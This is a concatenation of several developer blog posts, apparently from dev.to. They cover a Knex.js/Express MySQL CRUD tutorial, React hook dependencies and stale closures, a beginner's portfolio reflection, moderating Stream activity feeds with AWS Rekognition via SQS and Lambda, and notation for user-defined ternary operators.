Knex.js is a SQL query builder for Postgres, MSSQL, MySQL, MariaDB, SQLite3, Oracle, and Amazon Redshift designed to be flexible, portable, and fun to use. It features both traditional node style callbacks as well as a promise interface for cleaner async flow control, a stream interface, full-featured query and schema builders, transaction support (with savepoints), connection pooling and standardized responses between different query clients and dialects.
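To get a feel for what "query builder" means before wiring up a real database: the methods chain together and merely describe a query; nothing hits MySQL until the query is actually executed. The toy builder below is not Knex — it's just a few-line sketch of the same chaining idea:

```javascript
// A toy query builder illustrating the chaining pattern Knex uses.
// (Knex's real API is far richer and returns promises when executed.)
function table(name) {
  const wheres = [];
  return {
    where(column, value) {
      wheres.push(`${column} = '${value}'`);
      return this; // returning `this` is what enables chaining
    },
    toString() {
      const whereSql = wheres.length ? ` where ${wheres.join(" and ")}` : "";
      return `select * from ${name}${whereSql}`;
    },
  };
}

console.log(table("users").where("id", 1).toString());
// select * from users where id = '1'
```

With real Knex you can inspect the generated SQL in a similar way, e.g. `db('users').where('id', 1).toString()`.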
#### Create a project ####
Create a folder, then enter it and type the commands below:
```shell
npm init -y
npm i express knex mysql
```
Create a file called `app.js` in your project root and add the code below:
```javascript
const express = require('express')
const app = express()

app.get('/', (req, res) => {
  res.send('app running')
})

app.listen(5000, () => {
  console.log('Server running on http://localhost:5000');
})
```
Now, create a file for the database called `db.js` and add the code below. You need to replace the user (by default it's `root`), the password (default: empty string), and the database name.
```javascript
const knex = require("knex");

const db = knex({
  client: "mysql",
  connection: {
    host: "localhost",
    user: "root",
    password: "",
    database: "databasename",
  },
});

module.exports = db;
```
Now, in your database (called `databasename` here; you may replace it), create a table called `users` by running this command:
```sql
CREATE TABLE users (
  id INT NOT NULL AUTO_INCREMENT,
  name VARCHAR(255),
  isAdmin TINYINT DEFAULT 0,
  PRIMARY KEY(id)
);
```
OK, everything is done 😀. Now it's time to give it a shot 🦵. First of all, import `db` from our `db.js` file.
So, let's create a user from our app. For this, make a route called `/users/create` below our index route. When you visit http://localhost:5000/users/create it will insert a user into our `users` table in the database.
### Create ###
```javascript
const db = require('./db.js');

app.get('/users/create', async (req, res) => {
  const userId = await db('users').insert({
    name: "John Doe"
  })
  res.json({
    message: "User created",
    userId
  })
})
```
### Read ###
```javascript
app.get('/users', async (req, res) => {
  let users = await db('users').select()
  users = users.map(user => ({ ...user })) // needed because the mysql driver returns RowDataPacket objects
  res.json({
    users
  })
})
```
### Update ###
```javascript
app.get('/users/:id', async (req, res) => {
  const { id } = req.params;
  await db('users')
    .where('id', id)
    .update({
      name: "Saikat"
    });
  res.send('User updated');
})
```
### Delete ###
```javascript
app.get('/users/delete/:id', async (req, res) => {
  const { id } = req.params;
  await db('users').where('id', id).del();
  res.send('User deleted');
})
```
### Here is the full version ###
```javascript
const express = require('express')
const db = require('./db.js')
const app = express()

app.get('/', (req, res) => {
  res.send('app running')
})

// Create a user
app.get('/users/create', async (req, res) => {
  const userId = await db('users').insert({
    name: "John Doe"
  })
  res.json({
    message: "User created",
    userId
  })
})

// Query all users
app.get('/users', async (req, res) => {
  let users = await db('users').select()
  users = users.map(user => ({ ...user })) // needed because the mysql driver returns RowDataPacket objects
  res.json({
    users
  })
})

// Update a user
app.get('/users/:id', async (req, res) => {
  const { id } = req.params;
  await db('users')
    .where('id', id)
    .update({
      name: "Saikat"
    });
  res.send('User updated');
})

// Delete a user
app.get('/users/delete/:id', async (req, res) => {
  const { id } = req.params;
  await db('users').where('id', id).del();
  res.send('User deleted');
})

app.listen(5000, () => {
  console.log('Server running on http://localhost:5000');
})
``` | moniruzzamansaikat |
755,507 | React Hooks Dependencies and Stale Closures | After we got the confidence on the flow of hooks in React, it's important to understand about it's... | 0 | 2021-07-10T13:10:19 | https://www.bharathikannan.com/blog/react-hooks-dependencies-and-stale-closures | react, beginners, javascript, hooks | After we got the confidence on the [flow of hooks](https://dev.to/payapula/react-useeffect-hook-flow-2f7p) in React, it's important to understand about it's dependencies as well.
In this post we will dive a bit deeper into the dependency array of hooks.
As always, let's start with a Javascript example. Before looking at the output, try to guess what would be logged.
```javascript
function App(count) {
  console.log('Counter initialized with ' + count);
  return function print() {
    console.log(++count);
  };
}

let print = App(1);
print();
print();
print();

print = App(5);
print();
print();
```
The above function is a simple example of **closure** in JavaScript. The console output is as below.
```
Counter initialized with 1
2
3
4
Counter initialized with 5
6
7
```
If you can get it, then great! I will go ahead and explain what is happening.
The `App` function returns another function called `print`; this makes our `App` a higher order function.
> Any function that returns another function, or that takes a function as an argument, is called a higher order function.
```javascript
function App(count) {
  console.log('Counter initialized with ' + count);
  return function print() {
    console.log(++count);
  };
}
```
The returned function `print` _closes over_ the variable `count` from its outer scope. This closing is referred to as a **closure**.
Please don't get confused by the names of the functions. The names need not be identical; for example:
```javascript
function App(count) {
  console.log('Counter initialized with ' + count);
  return function increment() {
    console.log(++count);
  };
}

let someRandomName = App(1);
someRandomName(); // logs 2
```
Here `App` returns a function `increment`, and we assign it to the variable `someRandomName`.
To define a "Closure",
> A closure is the combination of a function bundled together (enclosed) with references to its surrounding state (the lexical environment). In other words, a closure gives you access to an outer function’s scope from an inner function. ~ [MDN](https://developer.mozilla.org/en-US/docs/Web/JavaScript/Closures)
Ah, that doesn't look like a simple definition, right?
Alright, MDN is not much help here; let us see what W3Schools says:
> A closure is a function having access to the parent scope, even after the parent function has closed. ~ [W3Schools](https://www.w3schools.com/js/js_function_closures.asp)
When we call the `App` function, we get the `print` function in return.
```javascript
let print = App(1);
```
The `App` function gets count as 1 and returns `print`, which simply increases the count and logs it. So each time `print` is called, the count is incremented and printed.
_If we write logic that uses closures and are not careful enough, we may fall into a pitfall called..._
## Stale Closures
To understand what stale closures are, let us take the same example and modify it further.
Take a look at this code and guess what would be getting logged into the console.
```javascript
function App() {
  let count = 0;

  function increment() {
    count = count + 1;
  }

  let message = `Count is ${count}`;

  function log() {
    console.log(message);
  }

  return [increment, log];
}

let [increment, log] = App();
increment();
increment();
increment();
log();
```
To break it down,
1. There are two variables `count` and `message` in our App.
2. We are returning two functions `increment` and `log`.
3. As per the name, `increment` increases our `count` and `log` simply logs the `message`.
Try to guess the output. Let me give you some space to think.
.
.
.
.
.
.
.
.
Warning! 🚨 Spoilers 🚨 ahead
.
.
.
.
.
.
.
.
The output is
```bash
Count is 0
```
Oh, did we fail to increment the count?
Let's find out by placing a console log inside our `increment` function:
```javascript
function App() {
  let count = 0;

  function increment() {
    count = count + 1;
    console.log(count);
  }

  let message = `Count is ${count}`;

  function log() {
    console.log(message);
  }

  return [increment, log];
}

let [increment, log] = App();
increment();
increment();
increment();
log();
```
And this time, the output will be
```bash
1
2
3
Count is 0
```
Yes, we are incrementing the `count` that is present in the lexical scope of `increment`. However, the problem is with the `message` and `log`.
Our `log` function _captured_ the `message` variable and kept it. So, when we increment the count, the `message` is not updated and our `log` returns the message "Count is 0".
To fix this stale closure, we can move `message` inside `log`:
```javascript
function App() {
  let count = 0;

  function increment() {
    count = count + 1;
    console.log(count);
  }

  function log() {
    let message = `Count is ${count}`;
    console.log(message);
  }

  return [increment, log];
}

let [increment, log] = App();
increment();
increment();
increment();
log();
```
And executing would produce the result,
```
1
2
3
Count is 3
```
As per the name, a _stale closure_ is when we fail to capture an updated value from the outer scope and end up with the _stale_ value.
Hmm... So, what does this _stale closure_ have to do with React?
## Hooks are nothing but Closures!
Let us bring the same JS example we saw above, into the react world,
```jsx
function App() {
  const [count, setCount] = React.useState(0);

  let message = `Count is ${count}`;

  React.useEffect(() => {
    if (count === 3) {
      console.log(message);
    }
  }, []);

  return (
    <div className="App">
      <h1>{count}</h1>
      <button
        onClick={() => {
          setCount((c) => c + 1);
        }}
      >
        Increment
      </button>
    </div>
  );
}
```
After hitting the `Increment` button three times, we should see a log that says "Count is 3".
Sadly, we don't even get anything logged!!!
This is, however, not an exact replica of our example from the JS world. The key difference is that in our React world, `message` does get updated on each render, but our `useEffect` just fails to capture the updated message.
To fix this stale closure problem, we need to specify both `count` and `message` in our dependency array.
```jsx
function App() {
  const [count, setCount] = React.useState(0);

  let message = `Count is ${count}`;

  React.useEffect(() => {
    if (count === 3) {
      console.log(message);
    }
  }, [count, message]);

  return (
    <div className="App">
      <h1>{count}</h1>
      <button
        onClick={() => {
          setCount((c) => c + 1);
        }}
      >
        Increment
      </button>
    </div>
  );
}
```
Note: this is just a contrived example. You may choose to ignore either of those dependencies since both are related: if `count` is updated, `message` gets updated too, so specifying just one of them is fine to get the expected output.
Things are simple with our example; the logic that we wrote inside the hook is not really a side effect. But it will get more and more complicated once we start to write hooks for data-fetching logic and other **real side effects**.
The one thing we always need to make sure of is:
> All of our dependencies for hooks must be specified in the dependency array, and we should not [lie to React about dependencies](https://overreacted.io/a-complete-guide-to-useeffect/#dont-lie-to-react-about-dependencies)
As I said, things get really complicated with closures in real-world applications, and it is very easy to miss a dependency in our hooks.
From my experience, if we fail to specify a dependency and it is not caught during testing, it will eventually cause a bug, and in order to fix it we may need to **re-write the entire logic** from scratch!!
This is a big 🚫 NO 🚫 and **MUST BE AVOIDED** at all costs. But how?
## ESLint Plugin React Hooks
In order to make our lives simpler, the React team wrote an ESLint plugin called `eslint-plugin-react-hooks` to capture all possible errors with the usage of hooks.
So when you are all set up with [eslint-plugin-react-hooks](https://www.npmjs.com/package/eslint-plugin-react-hooks), it will warn you about the possible consequences whenever you miss a dependency.
If you are using a recent create-react-app, this comes out of the box (`react-scripts` >= 3.0).
As seen below, when we violate the [rules of hooks](https://reactjs.org/docs/hooks-rules.html) we will get a nice warning suggesting that we are probably doing something wrong.

The above image shows the error from ESLint that reads, _React Hook React.useEffect has missing dependencies: 'count' and 'message'. Either include them or remove the dependency array._
It even fixes the dependency problem with just a single click!
Keep in mind that the stale closure problem does not affect only `useEffect`; we can run into the same problem with other hooks as well, like `useMemo` and `useCallback`.
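If "stale closure" sounds abstract, here is a minimal plain-JavaScript sketch (no React involved, and the names are made up purely for illustration) of a closure that keeps returning an outdated value, which is exactly what happens inside a hook callback that omits a dependency:

```javascript
// Minimal stale-closure sketch in plain JavaScript (no React).
// All names here are made up for illustration.
function makeCounter() {
  let count = 0;
  const readLive = () => count;     // reads the live variable every call
  const captured = count;           // copies the value *right now* (0)
  const readStale = () => captured; // forever stuck with that snapshot
  const increment = () => { count += 1; };
  return { readLive, readStale, increment };
}

const counter = makeCounter();
counter.increment();
counter.increment();
console.log(counter.readLive());  // 2 - always current
console.log(counter.readStale()); // 0 - the "stale closure"
```

A hook callback that leaves `count` out of its dependency array behaves like `readStale`: it keeps seeing the value from the render in which it was created.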
The ESLint plugin works with all the built-in React hooks and can also be configured to run on custom hooks. Apart from alerting you to dependency issues, it also checks all the rules of hooks, so make good use of it!
Again, to reinforce:
> 🚫 Don't Lie to React about Dependencies and 🚫 Don't disable this ESLint rule 🤷🏾♂️
---
Big Thanks to:
- [Getting Closure on Hooks by Shawn Wang](https://www.swyx.io/getting-closure-on-hooks/)
- [Be Aware of Stale Closures when Using React Hooks](https://dmitripavlutin.com/react-hooks-stale-closures/)
- [A Complete Guide to useEffect](https://overreacted.io/a-complete-guide-to-useeffect/)
- [5 Tips to Help You Avoid React Hooks Pitfalls](https://kentcdodds.com/blog/react-hooks-pitfalls)
- [Epic React by Kent.C.Dodds](https://epicreact.dev/) | payapula |
755,522 | Reflections on my portfolio | I was recently tasked with the project of making a personal webpage out of HTML and CSS. This is what... | 0 | 2021-07-10T12:52:26 | https://dev.to/elloo/reflections-on-my-portfolio-2gji | beginners, showdev, devjournal, codenewbie | ---
title: Reflections on my portfolio
published: true
description:
tags: beginners, showdev, devjournal, codenewbie
//cover_image: https://direct_url_to_image.jpg
---
I was recently tasked with the project of making a personal webpage out of HTML and CSS. [This](https://elloo.github.io/portfolio-2021/) is what I ended up with. The following is a little commentary on what I learned and what I will continue working on, amongst other things. Oh, and here's the [repo](https://github.com/elloo/portfolio-2021) if you're interested in the code. I might add images to this post later on - just gotta find a place to host them.
## 1) What went well? Key Learning.
The stand-out thing for my webpage is the CSS art. I'm lucky that my name almost sounds like a phrase "Ewe (L)in Loo" so I just went with that. Making the art allowed me to learn a lot about `position: relative` and `position: absolute`. I always tend to forget this though - maybe that's a sign that I need to continually be making CSS art.
The second thing I enjoy about this webpage is the sticky navbar. I feel the use of the border styling on the top and bottom ties together the look of the page while providing functionality. It was the first time I've used `position: sticky` before so it was interesting to see it in action.
## 2) What could have been improved?
I had to make the two two-column sections of the webpage in two different ways. Have I written 'two' enough? When I made the first two-column section, I was still in the frame of mind to make CSS art. This resulted in a `position`-based layout. For some reason, this wouldn't work on my portfolio section. I have a feeling it has something to do with the positioning of the other elements. With a time restriction, I had to quickly find a way to get the layout looking the way I wanted. That's where `display: flex` and flexbox came in.
I also wanted to make the back-to-top button sticky at the bottom, but couldn't figure it out. I guess the webpage is pretty short anyway, so maybe this would have been redundant.
Lastly, there are some small gaps between the navbar and its borders. I'm not sure why.
## 3) The key takeaways.
One of the key takeaways is not to underestimate how long it will take to code something. You never know when things won't function the way you expect them to, so you should always have your priorities straight.
## 4) The process you followed?
I started out by creating the CSS piece that's seen on loading the page. I knew I wanted to have something to make my page stand out, and I had this idea of turning my name into a pun. From there, the order of completion was the about section, footer, and portfolio. All along the way, I tried to remember to make frequent commits; I only pushed right before I was going to take a break from coding. It was very satisfying to be able to see my changes live.
Anyways, I hope my little project gave you a bit of a laugh. Let me know if there's anything else you'd like me to talk about or show me your own portfolio in the comments! | elloo |
755,587 | Moderating Actions on Stream's Activity Feeds service | (headline image by Claudio Schwarz) This is for Stream, or getstream.io's Activity... | 0 | 2021-07-11T07:04:26 | https://dev.to/scampiuk/moderating-actions-on-getstream-io-s-activity-feed-1m4 | getstreamio, aws, lambda, compliance |
######(headline image by [Claudio Schwarz](https://unsplash.com/@purzlbaum))
---
> This is for [Stream](https://getstream.io/activity-feeds/), or getstream.io's Activity Feeds service. This block is here so people who are searching for getstream.io can find it! I'm never sure how to refer to the company, as just calling it 'Stream' when discussing it in a development setting gets very confusing :(
---
## INTRO
In this tutorial, we're going to talk about, and solve, a problem with [Stream's Activity Feeds](https://getstream.io/activity-feeds/) product: there are no built-in moderation tools.
Is that a problem? Yes, it really is. Skipping past the legal question of [who is liable](https://www.dlapiper.com/en/japan/insights/publications/2020/12/ipt-news-q4-2020/whos-responsible-for-content-posted-on-the-internet-section-230-explained/) for [content on your platform](https://www.reuters.com/article/us-britain-tech-regulation-idUSKBN2060Q7), there's also compliance for User Generated Content on both the [App Store](https://developer.apple.com/app-store/review/guidelines/#user-generated-content) and [Google Play](https://support.google.com/googleplay/android-developer/answer/9878810?hl=en-GB&ref_topic=9877466) to consider.
We're going to look at setting up your Activity Feed Types so we can create a firewall between Activities being added and those being viewable. We're also going to talk about a way of handling image moderation: AWS's [Rekognition](https://aws.amazon.com/rekognition/) service.
This isn't a tutorial on how to implement this; rather, it's a guide on how to set up your Activity Feed Types so we can add moderation and other automation.
I'll cover the practical 'how-do' in another article (and I'll update this once I've written it!)
## WHAT YOU'LL NEED
* AWS account, and some basic understanding of what SQS is, and what Lambdas are,
* Getstream account, and some knowledge of the Activity Feed service
## AWS REKOGNITION
[AWS Rekognition](https://docs.aws.amazon.com/rekognition/latest/dg/moderation.html) is a machine learning tool that Amazon have trained on billions of images and videos, and we can use that power just by calling a simple API. By using this, we don't have to have people looking at each image manually, or deal with all the problems that come with that.
You'll want to be using the '[Detecting Inappropriate Images](https://docs.aws.amazon.com/rekognition/latest/dg/procedure-moderate-images.html)' part.
We need to upload the image to AWS Rekognition (support for which is built into the AWS SDK), and it will return a series of Labels, along with a Confidence (a number indicating how sure AWS is that the Label is right). Then we can use those to determine whether the images need to be hidden or not.
You can see in the AWS Rekognition documentation the list of Labels you can get back, and from that you can choose what kind of images you do and don't want on your platform.
## STREAM
Getting the Activity Feed Types right is the key here. We need to create a gap between the Activities created by users and those Activities being seen by other users.
### Common Activity Feed Type setup
Imagine we want a platform where we have content creators and content viewers. You could set it so each Creator has a `timeline` feed, and each Viewer has a `notification` feed that is subscribed to one or many Creator's Timelines.
Something like this:

Any time `creator-0001` publishes to their `timeline` feed, it will appear in the `notification` feed for `viewer-9876`.
You can see here, there is no way we can stop this happening. If `creator-0001` posts something we don't want, we're in trouble.
### Moderation Activity Feed Type setup
The solution is to create some kind of break between a Creator publishing something and a Viewer seeing it, so the Viewer never sees it before we've had a chance to moderate it.
Stream provide a way of doing this. For each Activity Feed Type, you can set it up to publish the Activity to an SQS queue, so we can grab it from the queue, look at it, then publish it somehow.
Something like this:

This method allows us to _code the link_ between the `unpublished_timeline:creator-0001` and the `published_timeline:creator-0001` feeds, and using AWS Rekognition we can inject image moderation into that step. In fact, with this step in place, we can perform any kind of moderation or action we want based on the published content.
Your Lambda should take the message from the SQS queue (something Stream have [written a tutorial on](https://getstream.io/blog/using-the-stream-real-time-firehose-with-aws-sqs-lambda-and-sns/)), and use the AWS SDK to send the image to Rekognition. Once you have your Labels back, you can then choose to "copy" the activity from one feed to another.
There isn't a way of copying an Activity from one feed to another that I know of, so you have to re-create the Activity on the `published` feed and remove it from the `unpublished` feed. If someone from Stream knows a better way to do this, I would appreciate you letting me know.
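To sketch what that Lambda step could look like (a rough sketch only: the banned-label list, the 60% threshold, the bucket name and the helper names are all illustrative assumptions, not values recommended by Stream or AWS), the label-filtering decision can be kept as a plain function, with the actual Rekognition call shown in comments:

```javascript
// Rough sketch of the moderation decision. BANNED_LABELS and the 60%
// threshold are illustrative assumptions - pick your own from the label
// list in the Rekognition moderation docs.
const BANNED_LABELS = ["Explicit Nudity", "Violence", "Hate Symbols"];

// Pure decision logic over Rekognition's ModerationLabels array:
// block the image if any banned label (or its parent category) comes
// back at or above the confidence threshold.
function isImageAcceptable(moderationLabels, minConfidence = 60) {
  return !moderationLabels.some(
    (label) =>
      label.Confidence >= minConfidence &&
      (BANNED_LABELS.includes(label.Name) ||
        BANNED_LABELS.includes(label.ParentName))
  );
}

// Inside the Lambda handler, the Rekognition call itself would look
// roughly like this (needs the aws-sdk package and IAM permissions,
// so it is commented out here):
//
// const AWS = require("aws-sdk");
// const rekognition = new AWS.Rekognition();
// const result = await rekognition
//   .detectModerationLabels({
//     Image: { S3Object: { Bucket: "my-bucket", Name: imageKey } },
//     MinConfidence: 50,
//   })
//   .promise();
// if (isImageAcceptable(result.ModerationLabels)) {
//   // re-create the Activity on the `published` feed,
//   // then remove it from the `unpublished` feed
// }

console.log(isImageAcceptable([{ Name: "Smoking", Confidence: 80 }]));
// -> true (not in the banned list)
console.log(
  isImageAcceptable([
    { Name: "Graphic Violence", ParentName: "Violence", Confidence: 95 },
  ])
);
// -> false (parent category "Violence" is banned at 95% confidence)
```

Keeping the decision logic separate from the AWS call also makes it trivial to unit-test without touching Rekognition at all.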
## CONCLUSION
With this set up, you will be able to perform any kind of moderation you wish on any Action published on your platform. Using Lambdas and SQS means your solution will scale with your demands, and you can use this model to build in any kind of events.
What about using SQS feeds to manage push notifications, or emails to users when content is published? It's also a good way of getting data _out_ of getstream into something you can look at and use without over-consuming your API usage.
I would be super interested in knowing if this solution works for you, or how you have approached this problem! Please reach out on Twitter to [@scampiuk](https://twitter.com/scampiuk) and let me know how it goes.
| scampiuk |
755,659 | Importance of Ds and its purpose | In this article, we will go through the title role that a Data Scientist plays. There is a covering... | 0 | 2021-07-10T16:29:47 | https://dev.to/antony51777843/importance-of-ds-and-its-purpose-3o50 |  | <p>In this article, we will go through the role that a Data Scientist plays. There is a shroud of mystery surrounding Data Science. While the term Data Science has been around for a while, very few people know about the real purpose of being a Data Scientist. </p>
<p>We will go through the various tasks that a Data Scientist must fulfill and understand what industries seek when employing Data Scientists. After this, we will look at the many types of industries which employ Data Scientists to make better decisions. So, let’s discover the purpose of Data Science. </p>
<h2>Purpose of Data Science?</h2>
<p>The principal purpose of <a href="https://globaltrainingbangalore.com/data-science-with-r-training-in-bangalore/">Data Science</a> is to find patterns within data. It uses various statistical techniques to examine and draw insights from the data. From data extraction and wrangling to pre-processing, a Data Scientist must scrutinize the data thoroughly.</p>
<p>Then, he has the duty of making predictions from the data. The goal of a Data Scientist is to derive conclusions from the data. Through these conclusions, he is able to help companies make smarter business decisions.
We will divide this blog into several sections to understand the role of a Data Scientist in more detail. </p>
<h2>Why Data Matters</h2>
<p>Data is the new electricity. We are living in the age of the fourth industrial revolution. This is the age of Artificial Intelligence and Big Data. There is a massive data explosion that has resulted in the emergence of new technologies and smarter products.</p>
<p>Around 2.5 exabytes of data are produced each day. The need for data has risen dramatically in the last decade. Many companies have centered their business on data. Data has created new segments in the IT industry. However: </p>
• Why do we need Data?
• Why do industries need Data?
• What makes data a precious commodity?
<p>The answer to these questions lies in the way companies have sought to transform their products.</p>
<h2>Data Science is a very recent term. </h2>
<p>Before Data Science, we had statisticians. These statisticians specialized in the quantitative examination of data, and companies employed them to analyze their overall performance and sales. </p>
<p>With the advent of computing, cloud storage, and analytical tools, the field of computer science merged with statistics. This gave birth to Data Science. </p>
<p>Early data analytics was based on measuring and finding solutions to public problems. For example, a survey regarding the number of children in a district would lead to a decision about the development of schools in that area. </p>
<p>With the help of computers, the decision-making process has been simplified. As a result, computers could solve more difficult statistical problems. As data started to multiply, companies started to realize its value. </p>
<p>Its significance is reflected in the many products designed to boost customer experiences. Industries required experts who could tap the potential that data held. Data could help them make the right business decisions and maximize their revenues.</p>
<p>Moreover, it gave businesses an opportunity to examine and act according to customer behavior based on purchasing patterns. Data helped businesses improve their revenue models and craft better-quality products for clients.</p>
<p>Data is to products what electricity is to household gadgets. We need data to engineer the products that we provide to users. It is what drives the product and makes it usable. A Data Scientist is comparable to a sculptor.</p>
<p>He carves the data to create something meaningful out of it. While it can be a tedious task, a Data Scientist needs to have the right expertise to deliver the results.</p>
<h2>Why is Data Science Important? </h2>
<p>Data creates magic. Industries need data to help them make careful decisions. Data Science turns raw data into meaningful insights. Therefore, industries need Data Science. A Data Scientist is a wizard who knows how to create magic using data. </p>
<p>A skilled Data Scientist will know how to extract meaningful information from whatever data he comes across. He steers the company in the right direction. The company requires sturdy data-driven decisions, at which he’s an expert. </p>
<p>The Data Scientist is skilled in various underlying fields of Statistics and Computer Science. He uses his analytical aptitude to solve business problems. </p>
<h2>Learn How to Become a Data Scientist</h2>
<p>A Data Scientist is well experienced in problem-solving and is tasked with finding patterns in data. His goal is to recognize recurring patterns and draw insights from them. Data Science requires a variety of tools to extract information from the data.
A Data Scientist is in charge of collecting, storing and maintaining both the structured and unstructured forms of data. While the role of Data Science focuses on the analysis and management of data, it depends on the domain that the company specializes in. This requires the Data Scientist to have domain knowledge of that particular industry. </p>
<h2>Purpose of Data Centric Industries </h2>
<p>As discussed above, companies need data. They need it for their data-driven decision models and for creating better customer experiences. In this section, we will explore the specific areas that these industries focus on in order to make smarter data-driven decisions. </p>
<h2>i. Data Science for Better Marketing </h2>
<p>Companies are using data to examine their marketing strategies and create better advertisements. Many times, industries spend an astronomical amount on marketing their products. This may at times not yield the expected results.
Therefore, by studying and analyzing customer feedback, companies are able to create better advertisements. The companies do so by carefully analyzing customer behavior online. Also, monitoring customer trends helps the company to get better market insights.
Therefore, businesses need Data Scientists to assist them in making strong decisions with regard to marketing campaigns and advertisements. </p>
<h2>ii. Data Science for Customer Acquisition </h2>
<p>Data Scientists help the company to acquire customers by examining their needs. This allows the companies to tailor products best suited to the requirements of their potential customers. Data holds the key for businesses to understand their clients. Therefore, the purpose of a Data Scientist here is to help companies recognize clients and deliver on the needs of their customers. </p>
<h2>iii. Data Science for Innovation </h2>
<p>Companies create better innovations with an abundance of data. Data Scientists aid in product innovation by analyzing data and drawing insights from existing designs.
They analyze customer reviews and help businesses craft products that sit well with the reviews and feedback. Using the data from client feedback, companies make decisions and take proper action in the right direction. </p>
<h2>iv. Data Science for Enriching Lives </h2>
<p>Customer data is key to making their lives better. Healthcare industries use the statistics available to them to assist their customers in everyday life.
Data Scientists in these types of industries have the purpose of examining personal data and health history and creating products that tackle the problems faced by customers. From the above examples of data-centric companies, it is clear that each company uses data differently. The use of data varies as per company requirements. Therefore, the purpose of Data Scientists hinges on the interests of the company. </p>
<h2>Other Skills for a Data Scientist</h2>
<p>Now, in this blog on the purpose of Data Science, we will see what other skills a Data Scientist needs. In this section, we will explore how a Data Scientist's job stretches beyond analyzing and drawing insights from the data.</p>
<p>More than using statistical techniques to draw conclusions, a Data Scientist's goal is to communicate his results to the company. A Data Scientist need not only be capable of number crunching but should also be capable of translating mathematical jargon into proper business decisions.</p>
<h3>For example</h3> Consider a Data Scientist analyzing the monthly sales of the company. He uses various statistical tools to analyze and draw conclusions from the data. In the end, he obtains results that he needs to share with the company.
<p>The Data Scientist needs to know how to communicate results in a very concise and simple manner. The technical results and processes may not be understood by the people handling sales and distribution.</p>
<p>Therefore, a Data Scientist must be able to tell stories with data. The storytelling of data will let him convey his knowledge to the management team without any hassle. Therefore, it broadens the purpose of a Data Scientist.</p>
<p>Data Science is a blend of management and IT. The purpose of a Data Scientist is not limited to the statistical processing of data but also includes managing and communicating data to help companies make better decisions.</p>
So, this was all about the purpose of Data Science. Hope you enjoyed our article.
<h2>Summary</h2>
At the end of this article on the purpose of Data Science, we conclude that Data Scientists are the backbone of data-intensive companies. The purpose of Data Scientists is to extract, pre-process and analyze data.
Through this, companies can make better decisions. Various companies have their own requirements and use data accordingly. In the end, the goal of a Data Scientist is to help businesses grow.
With the insights provided, companies can adopt appropriate strategies and position themselves for an enhanced customer experience.
Still, if you have any questions related to the purpose of Data Science, feel free to ask through the comments.
| antony51777843 | |
755,957 | User-defined Ternary Operator | Discussion about user-defined ternary operator | 0 | 2021-07-11T04:38:21 | https://dev.to/wongjiahau/user-defined-ternary-operator-453e | programminglanguage, notation, syntax | ---
title: User-defined Ternary Operator
published: true
description: Discussion about user-defined ternary operator
tags: programminglanguage,notation,syntax
//cover_image: https://direct_url_to_image.jpg
---
## Introduction
Ternary operator is a very useful syntactical notation
for condensing meaning. Basically it takes three
arguments, and syntactically speaking it's identifier is
split into two parts.
For example:
1. Javascript conditionals `a ? b : c`
2. Math range check `a < b < c`
3. SQL joins `a JOIN b ON c`
This is similar to why we
prefer **infix binary operators** (IBO): they can be
chained together easily (the so-called
[*associativity*](https://en.wikipedia.org/wiki/Operator_associativity)).
For example, most if not all of us will think that A is easier to read and understand than B:
|A|B|
|--|--|
|`a + b + c` | `(+ (+ a b) c)` |
Because IBO are so important,
most functional programming (FP) languages like Haskell
allow users to define custom IBO.
For example:
```hs
-- pipe forward operator
(|>) :: a -> (a -> b) -> b
a |> f = f a
-- example usage
main = [1, 2, 3]
|> map (+2)
|> filter (>3)
|> print -- [4, 5]
```
See more at [Haskell Infix Operator](https://wiki.haskell.org/Infix_operator).
## Emulating with binary operator
However, when it comes to user-defined ternary operators,
none of the mainstream programming languages provide such a mechanism.
Although a ternary operator can be emulated using a pair of
IBOs, the emulation is not without its own caveats.
Take [this example](https://wiki.haskell.org/Ternary_operator) from Haskell:
```hs
data Cond a = a :? a
infixl 0 ?
infixl 1 :?
(?) :: Bool -> Cond a -> a
True ? (x :? _) = x
False ? (_ :? y) = y
test = 1 < 2 ? "Yes" :? "No"
```
The caveat of such emulation is that partial usage is
not only syntactically valid, but also
semantically valid.
For example, we can omit that `:?`
part, and the compiler will **not** complain.
```hs
x = 1 < 2 ? "Yes"
```
From the user experience (UX) perspective, this is very bad,
because we intended users to always use `?` together with
`:?`.
## Emulating using mixfix operators
Other than using IBO, we can also emulate ternary operators using mixfix operators.
For example, in [Agda](https://agda.readthedocs.io/en/v2.6.2/language/mixfix-operators.html):
```hs
-- Example function name _if_else_
-- (emulating Python's conditional operator)
_if_else_ : {A : Set} -> A -> Bool -> A -> A
x if true else y = x
x if false else y = y
```
The caveat of this approach is that users will be
required to look up the syntax before they can even parse
a piece of code that is filled with mixfix operators.
Because, for example, the above `_if_else_` operator can also be defined as:
```hs
if_then_else_ : {A : Set} -> Bool -> A -> A -> A
if true then x else y = x
if false then x else y = y
```
In this case, the user will not be able to parse the following code correctly without knowing the syntax of `if` and/or `else`:
```hs
x = a if b else c -- is this correct?
y = if a then b else c -- or this?
```
## The Question
Due to the aforementioned caveats of emulating ternary
operators, I am on a quest to find a **mechanism** to allow
user-defined ternary operators that is:
1. Unambiguous (parsable by both machine and human)
2. Universal (can be applied to all kinds of ternary operators)
## Inspiration
I had been contemplating this question for a while with
no significant progress, until I read the
book [The Relational Model of Database
Management](https://www.amazon.com/Relational-Model-Database-Management-Version/dp/0201141922)
by the inventor of Relational Algebra, [Edgar. F. Codd](https://en.wikipedia.org/wiki/Edgar_F._Codd).
His notation for denoting theta-joins is ingenious.
For example,
|SQL|Edgar's notation|
|--|--|
|`X join Y on A join Z on B `|`X [A] Y [B] Z`|
The ingenious part about this is that he treats ternary
operators as **decorated binary operators**!
In the above example, the binary operator `[]`, is
decorated/tainted with `A`, giving it a different
meaning.
This actually also relates to the mathematical notation of theta-join:

In this case, the theta symbol is decorating the join
symbol, turning it into a ternary operator that still
behaves as a binary operator.
The advantage of this approach is that ternary
operators behave like binary operators, which means
that they can be chained together naturally.
## The Potential Answer
By expanding on the idea that ternary operators are just
decorated/tainted binary operators, I first came up with this idea:
Ternary operators can be defined using the following syntax:
```
a X[ b ]Y c
```
Where `a`, `b` and `c` are the arguments, and `X[` and
`]Y` are together the name of the ternary operators.
For example, let's define range-check:
```hs
-- Definition
a <[ b ]< c = a < b && b < c
-- Usage
print (1 <[2]< 3) -- true
print (1 <[3]< 2) -- false
```
Assuming `[` `]` is not used anywhere in the syntax of
the language, such ternary operator usage can be parsed
easily, because whenever the user or machine sees `[` or
`]`, they can anticipate a ternary operator.
However, the above syntax is obviously too noisy, so to
reduce the noise, we can swap the square brackets `[`
`]` for one of the most invisible ASCII characters, the backtick.
